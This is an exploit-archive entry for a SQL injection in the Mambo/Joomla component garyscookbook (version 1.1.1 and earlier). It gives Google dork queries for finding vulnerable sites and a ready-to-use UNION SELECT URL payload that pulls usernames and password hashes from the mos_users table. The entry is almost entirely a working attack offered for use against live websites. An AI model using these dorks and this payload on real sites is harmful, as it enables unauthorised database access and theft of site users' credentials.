id: 2688
date: 02/23/2008
title: Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability
author: S@BUN
cves: 

==================================================================
Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability
==================================================================



###############################################################
#
# joomla com_garyscookbook SQL Injection(id)
#
################################################################
#
#    there are alot site but exploit not working for all ? found alot
#
# DORK 1 : allinurl:"com_garyscookbook"
#
# DORK 2 : allinurl: com_garyscookbook "detail"
#
################################################################
EXPLOIT :

index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*






#  0day.today [2023-03-25]  #